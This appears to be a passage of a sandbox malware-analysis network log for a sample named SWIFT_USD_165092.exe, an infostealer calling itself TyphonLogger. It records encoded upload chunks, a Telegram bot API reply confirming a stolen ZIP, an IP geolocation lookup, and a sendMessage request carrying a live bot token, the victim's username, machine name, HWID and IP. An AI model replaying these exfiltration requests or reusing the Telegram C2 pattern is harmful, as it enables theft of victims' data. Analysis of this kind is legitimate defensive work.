                                                                                      2023-05-22 17:50:28 UTC514OUTData Raw: dc 00 63 34 5d 46 b6 61 d3 bb 17 e6 c7 57 0a c7 84 db 6e b0 ff 62 e6 14 4c c8 37 b1 79 72 b1 57 a0 04 71 b3 eb 71 94 7e e6 89 f6 a7 f8 a7 72 da 5b da 7a f4 df de fe c4 96 ce 2e 1d 02 a7 f8 f4 c3 2d d3 b8 93 36 6d 1d b6 fc 13 56 c5 60 04 96 f6 63 d0 07 58 48 e9 15 55 eb 45 f9 7a 70 60 e4 49 6b 3e 83 22 9c 4a 0e ad 44 7a 5a 87 08 65 5b 40 95 70 03 2d 35 a8 37 99 90 42 5c 82 be de dd 09 e0 8e 44 1c b2 ff bc 01 04 5c e2 5f 73 0e b3 8c 0a 60 8c cf 38 4a 42 a2 71 71 81 34 58 38 4c 17 38 ba 2e c2 32 e0 a4 c1 2d 90 00 a1 bd 20 53 2d 8f 0b 47 0f 41 d7 3f 26 20 64 63 8f b6 2e 87 fc c0 f4 df 15 63 f1 24 14 01 cf a4 08 86 c5 b8 20 6b 21 28 01 e5 50 40 06 85 c3 fc 4d 55 42 0d 4b f0 19 2c 41 b5 22 4b bd 2a 88 76 01 fd ea 0b 23 88 6e 88 aa ba 33 86 81 0c 03 59 0b 65 44
                                                                                      Data Ascii: c4]FaWnbL7yrWqq~r[z.-6mV`cXHUEzp`Ik>"JDzZe[@p-57B\D\_s`8JBqq4X8L8.2- S-GA?& dc.c$ k!(P@MUBK,A"K*v#n3YeD
                                                                                      2023-05-22 17:50:28 UTC530OUTData Raw: e0 ee 0f ee a0 12 3f ba 87 e7 fa b1 f5 1c d4 ca f7 7a f7 f7 34 b6 fb 7e bb fa ca 0f 9a 97 4f 39 10 7e d6 d9 ac e4 59 af 90 1f a6 94 8f c8 ec 9d 3c db f6 19 9d 04 df 7b 76 7f b1 75 a6 5a b8 ba cd f8 12 0f b4 ba 16 b4 cc 72 e1 07 8f f8 df 0d 87 84 d2 b9 ce c4 13 00 7b d7 7c 90 3e d2 2d f0 a4 ba 6e 86 6a 62 01 f6 7e 81 04 59 96 43 09 ef ca fd 19 4d 08 12 ec 90 e7 9c 82 1b 9b 0f eb e1 14 8e 08 a1 0c 86 4e e2 0f c3 b8 70 38 d8 13 24 0e 0a 39 0c cd 0d fd 9f b9 c1 25 1a 09 fc 23 fc 68 30 a0 e1 01 82 11 06 70 07 3f 09 82 c6 37 97 80 73 00 07 16 12 80 fe 93 de a3 83 e1 bd 0c 0e d2 00 ef 68 1c 87 e5 76 20 30 29 d2 98 82 48 9f fa 90 ac 28 98 d3 4d 87 10 a4 25 30 04 69 dc 71 e4 28 02 e4 1f 7a 0c 08 61 1a 0b 08 d2 78 84 36 ca 75 f3 fe fe 1a b3 8a 29 59 13 ad cb d1 0c
                                                                                      Data Ascii: ?z4~O9~Y<{vuZr{|>-njb~YCMNp8$9%#h0p?7shv 0)H(M%0iq(zax6u)Y
                                                                                      2023-05-22 17:50:28 UTC546OUTData Raw: de bf a9 4e 7c 2a ee ab b3 15 03 3f 96 90 04 1a 88 d8 c9 ab 10 07 ec 90 26 a9 35 16 de 57 97 c5 80 db 33 39 c1 01 a3 10 43 2d f8 28 da 12 41 87 08 7b 40 4a cd 2c ea 15 c5 91 2c 06 21 1f 86 c6 12 1f 45 2a fe b7 42 a0 c2 22 83 fb c8 f6 2c 28 83 56 f8 7f 03 60 35 e1 63 88 30 18 d7 18 5a 85 78 2d 11 a9 4c 1c ba 97 31 67 3e 0b 0a ec 00 15 d1 4c 8c 42 f3 d3 a4 59 7c 9d 10 e4 42 62 66 20 52 98 8e bb 42 2e 51 85 91 57 b4 eb 4b 02 38 7c 54 7f 4e 3a 5f b4 28 bc 53 ee be 35 c4 f6 aa 03 d1 d4 30 c7 a6 2c a0 5b d8 0b 67 8b 6a 19 69 91 bc 8d 99 f5 33 31 2c 63 a2 1a 73 25 e1 13 ec e1 f8 2f 87 c5 05 75 e9 ce 66 52 43 0a eb b9 66 94 89 ba 95 9e 3d de 70 a7 b2 2b 60 ef 91 7b 2b aa ec 28 a9 88 99 f7 5b 83 ec c6 48 09 49 e3 2e c4 e7 6d a3 79 5a d4 8c 48 80 a1 9e f3 36 7c 1d
                                                                                      Data Ascii: N|*?&5W39C-(A{@J,,!E*B",(V`5c0Zx-L1g>LBY|Bbf RB.QWK8|TN:_(S50,[gji31,cs%/ufRCf=p+`{+([HI.myZH6|
                                                                                      2023-05-22 17:50:28 UTC562OUTData Raw: 64 1e a8 cb 44 d7 24 b0 e8 da dd 70 00 05 54 e8 31 8d 66 c2 b3 49 a4 ae f2 ff ca 36 21 df 19 4b e8 81 2c 7d 61 56 fb 71 02 3e ca 46 19 d1 ef af 22 ce 1b 16 1d 96 77 f3 97 b1 18 09 47 e6 46 cc 9b c3 a9 e8 4f 8f 41 c1 5c 5f d3 98 e6 60 1a d4 37 e8 f3 e7 e2 98 fa c0 d0 32 51 72 79 59 44 ce c3 26 45 45 e3 6e 51 12 0b fc 55 27 4a 1c 8c d5 e8 27 80 1c fa 38 f8 4a f9 ca c4 dc e1 69 02 7c 51 70 0c 4e b7 28 80 11 2b 46 0f a0 80 b0 f0 b2 94 28 e3 6e 90 dc 05 41 ca 86 11 33 c1 04 ca f4 7e 8d c0 21 ba 68 82 fb 75 ac 24 13 a0 e2 0c e2 78 ac 93 58 42 70 11 04 f8 b8 dc a5 90 68 79 86 00 9c 20 ae 22 8d dc 41 90 09 9d 92 08 46 20 19 12 8f 9e 6b 79 49 9a 7f 99 18 02 a0 97 d4 6b 84 77 69 44 97 24 81 a0 69 eb 9a 58 ee 00 12 24 1c dd 7f 93 13 32 61 ca 23 5a 75 ed 79 49 46 1c
                                                                                      Data Ascii: dD$pT1fI6!K,}aVq>F"wGFOA\_`72QryYD&EEnQU'J'8Ji|QpN(+F(nA3~!hu$xXBphy "AF kyIkwiD$iX$2a#ZuyIF
                                                                                      2023-05-22 17:50:28 UTC578OUTData Raw: c5 aa 90 82 e4 2a 49 a5 bf 6f 61 71 d9 41 36 60 d5 ca a2 d1 d3 13 f2 2c de f2 b0 3e 0c 27 99 ad f9 96 bd 1e 49 a4 8a ed 97 06 68 35 16 40 30 ad a2 6b 65 f3 1b b0 db 61 f7 6c 42 6a ef 7a 12 bf fa ff d7 54 5f 97 1e 75 c6 ac 19 13 db 37 0a fc 82 84 13 93 31 6f 77 09 b7 1f c6 15 36 82 dc 42 ca 0a 53 d2 0b da 2b be f7 87 af 05 5c d8 5e 8d be 61 8b dc f6 5b e1 ff f3 4b f8 c2 05 a2 46 22 02 7e 83 f9 5b 0d 86 f4 91 fc d9 59 11 7f a3 3f e9 1c b7 47 2a 28 b2 e2 c2 c0 ea 05 ef 92 c4 1f 8a ee 1b bd 7c 1f 9f f9 7e 52 20 bb cb 5d 37 16 0c ae 16 4e 36 3a 27 62 34 39 10 d9 64 f7 f4 87 a6 ff 58 bd 47 c5 03 fc 1e ef aa 78 1b ee 53 b8 e4 a8 cf 6a 7b c2 8b b2 81 d7 c6 91 da db b7 9e a7 59 b3 57 32 3d dd 39 03 02 75 cd e5 85 cc 59 f8 58 bf dc 97 20 2f 35 dc fb 30 b5 7c 02 2d
                                                                                      Data Ascii: *IoaqA6`,>'Ih5@0kealBjzT_u71ow6BS+\^a[KF"~[Y?G*(|~R ]7N6:'b49dXGxSj{YW2=9uYX /50|-
                                                                                      2023-05-22 17:50:28 UTC594OUTData Raw: 66 03 11 1d 6d 44 2c 2a ea e6 cc ef 9d 84 f1 ce 33 c0 b6 cd 3d 3c d2 ed b6 7d db c2 5a b8 60 77 b0 a0 c4 69 5d 43 9c 84 e3 01 6b 68 6e 10 27 0d 1e c0 48 65 6f b4 02 00 8c a4 0e 42 36 76 02 5a 4f c1 59 52 cf a6 14 44 c3 33 c9 83 14 48 19 0b d0 a4 f0 a2 09 e9 f9 24 b0 15 0c e1 81 b8 37 fa 24 58 db 72 1e ff d7 1a 42 a6 5e 01 f4 3a 00 14 c8 bd 06 2d 81 07 a1 23 18 81 12 72 4c e4 e0 a6 38 1d 17 d9 01 ea 5d 24 56 94 a4 90 64 a0 eb 41 41 69 47 4a 72 28 75 0f 80 88 2f 46 97 cc ba 85 03 7a 9b 96 40 88 21 7c ad c3 48 90 56 fb 85 01 73 52 44 4b 28 f6 00 4f af 26 39 43 10 6c 61 41 78 16 05 e9 12 88 88 04 49 30 0c b4 eb 20 7e 47 72 81 ae 89 88 71 f0 3e ca a3 8a de fe c9 8a bc 0e ca 78 c0 42 87 06 88 46 a9 75 58 6e 11 41 fc 0c dd 4d 87 19 fa 4b 00 2c c3 a0 d0 25 0d 09
                                                                                      Data Ascii: fmD,*3=<}Z`wi]Ckhn'HeoB6vZOYRD3H$7$XrB^:-#rL8]$VdAAiGJr(u/Fz@!|HVsRDK(O&9ClaAxI0 ~Grq>xBFuXnAMK,%
                                                                                      2023-05-22 17:50:28 UTC610OUTData Raw: 97 72 fe eb 6c 8c 4a 92 e6 b4 6f 8b 03 9d 70 96 55 cb 9f 43 fd d9 5b bb 27 56 8a 71 77 bd 15 37 9c f7 d4 3c ae d5 cd dc 8e 57 c6 86 7e 3d bc de bb 5a 7a 6c c8 d7 10 65 d3 bd fd db e2 d5 53 54 df 32 e9 77 2c 13 f9 65 d7 e1 67 66 ba ce c7 c4 ee e5 16 0b 8f ae 56 ed c5 bc 97 a2 02 af 32 bb f6 a3 dc 3e 96 9d 53 5a 98 65 ef 01 9f 38 ff 39 de f7 a1 7f b2 75 a6 71 5f 40 98 af 06 6f d0 5d 3e 3b d0 7d f9 cd cf bd 88 80 fa 3f 41 65 fb 21 f2 c2 54 80 ae e4 c4 93 8d f1 6d 63 d5 13 bb 1c f8 f1 6d 48 f6 94 31 15 38 24 fb 88 0a e8 95 68 53 01 fa 84 3d b7 a4 e4 62 f7 dc 6d 3e b3 f7 b5 41 e5 86 8e 5c 0c c5 a2 a1 6c 67 3a f0 f8 80 92 d2 b2 02 fd 60 b7 9d 30 44 d7 19 cb 2d 96 11 eb 5b 85 82 05 3b 97 ca dc c7 f7 e9 d0 45 b0 8b de f2 43 9b 55 7b 7c 92 15 f2 81 c3 8b 11 81 47
                                                                                      Data Ascii: rlJopUC['Vqw7<W~=ZzleST2w,egfV2>SZe89uq_@o]>;}?Ae!TmcmH18$hS=bm>A\lg:`0D-[;ECU{|G
                                                                                      2023-05-22 17:50:28 UTC626OUTData Raw: 86 6b 6c 45 33 2d d1 4b 3e 5f 9e db a7 5b 8e 2c 1e 37 3a 46 3f 63 0b 34 d3 dc 63 d8 8c 77 ae 68 12 53 7c 87 af fe f0 99 e2 f3 1f cd f3 8b f2 f8 0f 16 39 e2 96 16 d1 72 57 15 72 f7 b5 9f d6 fd fd 7c de d7 20 cd fb 41 25 c8 7a d2 ad 45 61 ad f9 fb 44 a6 e4 43 6f 9d af fb 8a 08 2c 5a 60 54 fa 7f 02 a2 06 c4 97 1c d2 46 1d 28 d1 b5 66 12 97 bc 0b 58 5d e2 6a 27 f1 a4 38 01 47 91 14 b7 6f 29 28 2f 29 7c 12 97 c2 52 56 ed 04 69 9d cf e6 b5 99 9d 90 40 ac da ae a8 c7 2b 7c 44 2e 2d 4c 1a 20 3d 8c 06 7a 57 d4 5b 65 f4 8d 80 cd 4b 2e 65 46 e4 42 8a 36 ee 5c 53 fd 1e 33 f1 d5 ca 73 d4 46 14 39 2d 71 29 c7 c9 73 37 d3 20 f6 ba 4e 74 fb fe 36 e3 c3 f6 85 f4 f5 15 f2 d0 2f 1f 19 f1 27 e4 1b c2 85 1a 7d b0 71 8c 4d 6d 46 10 b5 c5 5d 61 85 0d f5 a6 83 82 e9 cf 07 b4 48
                                                                                      Data Ascii: klE3-K>_[,7:F?c4cwhS|9rWr| A%zEaDCo,Z`TF(fX]j'8Go)(/)|RVi@+|D.-L =zW[eK.eFB6\S3sF9-q)s7 Nt6/'}qMmF]aH
                                                                                      2023-05-22 17:50:28 UTC642OUTData Raw: 39 59 3f a3 b1 77 fd d2 bc 99 54 f6 0c d8 6c d3 8f 3d 3d 05 85 5a 25 8d 41 5f 0b 65 ed b3 aa 04 96 06 92 1f c8 5c 36 41 a1 bc 21 cb 93 f9 7d d5 c6 39 4a a8 55 88 37 c4 8f 3d 2d 89 8a 23 75 4a ad 21 da bf fb 43 cb 56 21 6c 90 5a 8d cb ba 08 25 1f 32 1b 8f 2d 4f 16 2d 32 a2 db c0 c1 2d 4f 12 b2 12 ed 66 02 f3 10 13 25 6d b0 d5 68 dd b2 90 b9 40 e2 e1 f6 5d 34 1f bb ea 51 1b ed a6 15 87 79 98 88 55 49 c4 3e d4 6b 38 97 b4 55 b6 ca bf a8 7b 73 11 f3 40 43 d1 bd ec 9e 70 a3 f7 f1 67 c5 3f 00 e5 dc dd 31 94 76 7a 11 d1 57 dd d5 6f 9c bc 68 60 58 a3 51 6c e7 cf 57 16 79 d5 5d f6 2a 2e fa 89 80 17 3f c4 2d bd 8f 89 58 94 a3 87 03 01 18 fc 3d ee 47 a5 a9 19 d3 a2 61 b0 9e 7b 8f 3b 93 99 50 39 c4 52 0c 21 0f 15 ec 33 97 0e 87 85 ce 33 95 c2 c1 1d 9d 72 70 61 dc c0
                                                                                      Data Ascii: 9Y?wTl==Z%A_e\6A!}9JU7=-#uJ!CV!lZ%2-O-2-Of%mh@]4QyUI>k8U{s@Cpg?1vzWoh`XQlWy]*.?-X=Ga{;P9R!33rpa
                                                                                      2023-05-22 17:50:28 UTC658OUTData Raw: 07 e6 9a 70 39 41 3a 51 96 9f 1b b7 8e 0c 6b 92 a7 e2 82 f4 be e7 ff a4 13 9b bd f2 87 cf 36 e1 e3 56 ba f0 b7 5f 06 3b 9a c1 25 f6 11 e3 f3 5b a5 fb 06 71 bb 49 32 09 9f fb a9 33 c8 5f 88 49 7b 07 dc 8f d6 12 f9 ad 12 cd f8 8a 05 52 79 e9 c6 70 50 f5 6f da 4c d8 4f de 7a f8 5a 43 6d 30 f1 fc be 1d d7 0c f2 ef 0c c2 f9 a1 e8 4e 01 3d e7 b7 3c 6f f1 89 ff b2 61 d4 8a 85 90 f2 54 c6 2a 28 a8 fa ad ea 56 d9 c5 f8 35 d3 fe f0 4e 9a 72 70 39 ee f7 de 98 5f 2a 4e 6f d3 c3 a3 5c dc d1 b3 cc 75 2c 57 42 f1 ba a2 dc 52 d0 95 2f a5 37 ce 73 f9 e3 0c 53 71 75 6d 85 6d a9 f7 53 a0 26 6d b9 16 17 09 61 ef 5c ba 6f 39 1a ed 48 a5 85 27 62 ba 3d 79 97 8f 41 57 ce 4c 91 c9 f7 16 12 69 2a f0 5f d8 57 8a 86 8d 7e 14 e3 67 19 4b 99 eb 95 37 95 f7 26 98 f7 08 73 f5 0a 66 6d
                                                                                      Data Ascii: p9A:Qk6V_;%[qI23_I{RypPoLOzZCm0N=<oaT*(V5Nrp9_*No\u,WBR/7sSqummS&ma\o9H'b=yAWLi*_W~gK7&sfm
                                                                                      2023-05-22 17:50:28 UTC674OUTData Raw: ff b8 7b 30 ce 5f 91 4c c3 72 cb d7 d3 f5 50 5c 89 a2 a7 6e ef 0a 52 ed fa 61 a6 90 65 c2 fc 83 6a f2 46 e0 87 87 d4 54 b7 26 7e 53 34 fc 8e 8d 2f 8e 70 b9 ed c5 ae 76 08 d4 ad 2c eb ed ed 99 1c 02 63 c2 87 00 4b 7e f6 1e 7a d9 6d 24 c1 c3 8e b5 7e cc 2b cd b3 ab a4 b0 96 4b f5 fc de fc f4 96 9d e0 7b 8e 64 6b 81 cc 38 38 4c ba ed e2 a3 38 31 1e a0 90 95 ca 73 3a df 46 92 bb 00 cf e9 90 33 ab d7 c3 2f 78 d3 ce cd 7e 85 ba d1 c8 9e 02 b1 1f e3 13 22 8d 81 dd 1d 7c 75 e1 4e f1 87 e7 07 f3 1a 55 4f bf f9 7a e9 9d 1d ac 68 e4 56 56 ee b9 42 7d 25 99 ef 65 be bd 25 94 1b 39 8b e1 85 cf 09 a3 d1 20 18 01 f9 15 2e 49 fe 69 10 48 7a a0 14 e1 2d c5 15 12 87 0d 02 69 2e 3c b5 43 9e 12 68 47 f3 92 98 83 54 00 01 54 91 d0 00 50 ea 4f c2 cb 29 61 5a f0 d3 d0 52 5c 2c
                                                                                      Data Ascii: {0_LrP\nRaejFT&~S4/pv,cK~zm$~+K{dk88L81s:F3/x~"|uNUOzhVVB}%e%9 .IiHz-i.<ChGTTPO)aZR\,
                                                                                      2023-05-22 17:50:28 UTC690OUTData Raw: db 61 33 ac 25 8e 17 a6 d2 36 15 7a d5 bf 1c bb 33 3c fa 44 24 b6 a6 25 60 4e 7c a2 33 5b ec b9 6a cb aa 25 ca cf 99 87 f5 a9 79 a2 68 d3 b7 c3 1b b3 d2 59 49 e2 e1 bf 92 56 3a 8b 5f cc 27 a3 24 fb 6c ff 08 95 a6 86 54 76 f3 c4 41 e4 4e 1d e6 66 17 0b aa e9 f0 e3 e2 90 0b e8 b3 36 1c 7f d9 9f 25 b9 76 d5 d9 ff ee c6 5e f8 5d c4 24 87 c0 00 ae 22 c2 3c 79 79 66 18 f9 10 a7 2f 72 55 3a aa a1 73 ed c2 f2 88 48 42 1c 89 5e 5e 5d ad 47 4d c3 a0 77 89 b4 e8 d1 b2 15 7b 79 b4 ed a8 e1 62 e5 b9 0f 6c 7f 0c 82 62 b0 cd 3f f3 c7 2d be fb 16 91 f0 50 04 b4 6d bc 7e 27 7d 77 43 5d 20 e0 fb e8 fb 14 9f 1b 2f 1d 13 78 4c 82 9f 04 db df 52 19 17 2a 75 41 6b bd bd bc c5 b2 ae 16 18 e4 62 9f 31 c2 b5 a5 53 54 fa 92 ed cf 9f ae 13 a7 53 7e 1f 91 f7 fd c2 3f 97 af 5a b1 2c
                                                                                      Data Ascii: a3%6z3<D$%`N|3[j%yhYIV:_'$lTvANf6%v^]$"<yyf/rU:sHB^^]GMw{yblb?-Pm~'}wC] /xLR*uAkb1STS~?Z,
                                                                                      2023-05-22 17:50:28 UTC706OUTData Raw: cd ba 6e f8 db 86 c6 53 09 95 c3 df bd 5d e2 68 ec 49 cb 8f b6 c8 56 6b 94 95 da 25 a0 e0 e1 e9 25 60 64 52 73 fc 65 62 85 d1 d6 2f 55 9f 50 17 16 31 f9 d9 7d 81 dc c6 9e ca 5b 7a c8 ae 57 25 df 0e 45 98 74 8c c0 1e 7d 8f ec 38 e0 cd 41 c7 4e 9a a7 2d 46 b1 f4 37 cf f5 2d ea eb 08 51 95 bf 9f 78 f7 60 94 9b 3f 14 e6 9a 2e e7 3f 48 7d 25 57 f6 89 d0 24 5d 95 80 ba 25 c6 69 0b 5c 76 f9 fd 8b 8d df 8a 42 5b 22 88 a1 f3 17 8a 5b 27 6d ee a7 66 13 5d 74 3c 28 ec b9 12 a8 c7 69 ff cc c3 52 ac 42 68 bc f9 47 e3 46 37 b5 ce 6c 4b 9d be e6 c8 86 7e e8 2b e3 a0 55 eb 4b 40 6f 4f 6b 17 11 d7 33 d6 16 f0 88 6d 60 cc 6a c3 91 6a a0 0b 7f a5 21 15 4e 1b fd aa ca f4 0b fa e1 93 92 d6 63 95 4b c0 a6 71 7c 07 b8 e5 12 70 cd e1 ce 79 d9 b6 f5 f3 95 e6 f3 82 fe e9 d5 d5 47
                                                                                      Data Ascii: nS]hIVk%%`dRseb/UP1}[zW%Et}8AN-F7-Qx`?.?H}%W$]%i\vB["['mf]t<(iRBhGF7lK~+UK@oOk3m`jj!NcKq|pyG
                                                                                      2023-05-22 17:50:28 UTC722OUTData Raw: ce a8 f1 bd 22 60 4f 1a 8d a4 ad e7 51 e0 24 70 77 ee b5 94 4c 41 80 63 5b 5d ee 64 7e 4b 9e 2c 1c 6b dc 79 a8 fd b5 d5 c1 bf 0e ba 5b 91 78 f9 db 02 1d 44 69 2a 5e 3b 6d 5b 3c d9 52 aa 89 71 af d5 a7 c2 e1 35 12 96 c3 0a 61 5d 65 3f 95 3b 3f 51 0e 20 e1 3e ea 05 9e 77 1f a9 ad f9 d2 41 59 b2 6d 3b 6b da bb 95 3f 76 61 74 d0 85 93 da 8b 43 ce f3 ce 26 d7 92 33 46 5d f4 8c 37 79 66 26 7d d3 61 43 56 53 de 39 f8 19 7f 74 31 bf 7e 76 a1 74 62 cc 98 c2 55 b8 31 7e 75 12 bf 66 6d 8b fe a7 10 db 18 af 65 7f b0 2c 65 e7 e5 f2 69 8f bd 98 3d 05 34 e7 37 40 d8 ff 35 da f5 e6 b8 e4 fe a9 ba f5 ea ee 87 1d 2f b5 44 29 f2 0f 42 be 48 25 9c 8f 66 fa 2e cf 72 ea 92 44 f9 d5 61 4a 4a 1d 61 c6 f6 6f f3 f7 7b f1 32 b8 90 42 21 94 e3 ce 47 3a 88 e9 7a a0 c0 aa 45 c2 d7 95
                                                                                      Data Ascii: "`OQ$pwLAc[]d~K,ky[xDi*^;m[<Rq5a]e?;?Q >wAYm;k?vatC&3F]7yf&}aCVS9t1~vtbU1~ufme,ei=47@5/D)BH%f.rDaJJao{2B!G:zE
                                                                                      2023-05-22 17:50:28 UTC738OUTData Raw: a8 98 88 be f9 b2 ef 27 b8 e3 67 5d be 56 0b c0 af 2e f4 72 31 77 c0 4c 26 70 90 16 56 ba cc b8 c1 df 64 0a 7b 07 dc 90 89 f0 e5 d8 c4 47 99 e9 c8 b3 d3 4b a0 e0 d3 a3 74 d8 e0 02 e5 25 8c 58 53 14 28 40 82 a9 46 e0 27 7d 67 1e 9f 9d cb 66 14 6a 7a 7b f3 14 2a 10 dd 60 27 c2 89 c7 41 d0 93 ba 66 70 28 bd 35 45 14 25 37 0e 49 af 9c 81 06 40 ce 9a 11 01 3c 49 2c 91 31 15 89 f5 d0 a3 8c 98 32 c3 44 74 48 51 c6 cc 6a 35 5c 6f c1 4b d2 b0 f7 ac 28 1d c8 e7 32 e1 3e f4 8c 4b aa 4d 67 95 41 93 34 b1 84 d5 97 7f 34 cd 97 31 93 55 de 92 31 0f fa 04 d2 89 c0 5a 5f 8e 6f 89 f1 b3 e8 c3 58 34 30 93 9c 1d 53 bc d4 ef 9a 34 e5 80 ff ea e7 26 78 43 06 5a 49 cc 0b 44 db ed 32 bc 59 ea 90 5c 81 18 69 45 c3 26 26 bc ac c6 20 4e 24 ea 3a 5f 56 48 89 1c bb 39 cb c9 41 19 e3
                                                                                      Data Ascii: 'g]V.r1wL&pVd{GKt%XS(@F'}gfjz{*`'Afp(5E%7I@<I,12DtHQj5\oK(2>KMgA441U1Z_oX40S4&xCZID2Y\iE&& N$:_VH9A
                                                                                      2023-05-22 17:50:28 UTC754OUTData Raw: a9 fe 04 5f 8a 74 fd 3e 78 84 fe 47 02 56 53 80 ba c5 e5 b1 60 86 88 02 53 ba eb 63 37 c7 72 d6 6b ed f3 3b a2 43 6d 3f f3 4d e6 64 14 ae de 54 58 af dc e2 a2 b1 42 c8 9a 5d 75 a4 8f 79 5e f7 7a 35 e4 18 ec 52 58 50 84 14 3c ab e4 d2 2b 15 1b 56 1e f7 de 94 89 fd 27 7e 8d 8b 8c 4b 3b 07 35 df 3f 54 e7 78 e1 33 f2 c3 6e 6f a9 b3 a5 8d cb 9d f2 74 9f 7d 7d 76 93 68 45 48 18 b4 7e 3e 69 f4 8d 89 a7 a8 5c 8a be 5b 73 b9 27 63 33 b5 d0 b3 b8 c1 d6 85 e9 ed 8e 58 57 45 c6 0b 99 b3 76 df cf 50 0f 0a 5d 98 e8 11 36 d1 23 78 6b 7f f0 be 27 82 1f b4 df 3f 04 d8 57 c5 ee 32 6d 6c 81 ad 69 6f 8d aa 33 9e 41 9f 3f 5d 68 77 10 9c 28 7b 9d 9f f1 09 33 6d d9 30 1c 2f b2 dd cf d3 23 62 38 cf cc 3a 6f 23 74 36 c8 96 ae 8c b5 66 07 61 c2 96 60 5e ea b0 fd c7 70 43 e1 3c 88
                                                                                      Data Ascii: _t>xGVS`Sc7rk;Cm?MdTXB]uy^z5RXP<+V'~K;5?Tx3not}}vhEH~>i\[s'c3XWEvP]6#xk'?W2mlio3A?]hw({3m0/#b8:o#t6fa`^pC<
                                                                                      2023-05-22 17:50:28 UTC763OUTData Raw: 0d 0a 2d 2d 30 63 35 35 32 61 66 66 2d 39 37 61 31 2d 34 31 36 63 2d 39 32 63 35 2d 65 38 36 35 32 34 66 61 32 62 65 35 2d 2d 0d 0a
                                                                                      Data Ascii: --0c552aff-97a1-416c-92c5-e86524fa2be5--
                                                                                      2023-05-22 17:50:28 UTC | 763 kB | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 22 May 2023 17:50:28 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 516
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":723,"from":{"id":5869127049,"is_bot":true,"first_name":"MMtrade Bot","username":"mmtraded_bot"},"chat":{"id":1689002171,"first_name":"MM","last_name":"Trade","username":"mmtrade_001","type":"private"},"date":1684777828,"document":{"file_name":"C_UsersuserAppDataLocalTemp22_05_02023_20_48_14=user@12875.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIC02Rrq2Qk0DT3wE25fVtSdxEsoc_-AAIBEAAClttYU9vIT8UPeCrkLwQ","file_unique_id":"AgADARAAApbbWFM","file_size":778434}}}


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      3 | 192.168.2.5 | 49725 | 172.67.69.226 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      2023-05-22 17:50:46 UTC | 764 kB | OUT | GET /84.17.52.45/json HTTP/1.1
                                                                                      User-Agent: ipapi.co /#c-sharp-v1.03
                                                                                      Host: ipapi.co
                                                                                      Connection: Keep-Alive
                                                                                      2023-05-22 17:50:46 UTC | 764 kB | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 22 May 2023 17:50:46 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 751
                                                                                      Connection: close
                                                                                      Allow: HEAD, OPTIONS, OPTIONS, POST, GET
                                                                                      X-Frame-Options: DENY
                                                                                      Vary: Host, Origin
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Referrer-Policy: same-origin
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FGdeuK1NqwR4cXZ%2FN3sz6NT%2B28z8HxLBGev2KALfrfa0Z5kEJZk%2FwlbG8guMK0dl%2BNFo2tX75w%2BexbSe1NvGNQzsO8EmmF535qIT9hjnQlz9OThBCdPcBU%2Fx"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 7cb6e742fcbb9106-FRA
                                                                                      2023-05-22 17:50:46 UTC765INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 34 35 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 30 2f 32 33 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 5a 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 43 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 43 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 5f 69 73
                                                                                      Data Ascii: { "ip": "84.17.52.45", "network": "84.17.52.0/23", "version": "IPv4", "city": "Zurich", "region": "Zurich", "region_code": "ZH", "country": "CH", "country_name": "Switzerland", "country_code": "CH", "country_code_is
                                                                                      2023-05-22 17:50:46 UTC766INData Raw: 20 20 20 22 61 73 6e 22 3a 20 22 41 53 32 31 32 32 33 38 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 0a 7d
                                                                                      Data Ascii: "asn": "AS212238", "org": "Datacamp Limited"}


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                      4 | 192.168.2.5 | 49726 | 149.154.167.220 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                      2023-05-22 17:51:34 UTC | 766 kB | OUT | GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1
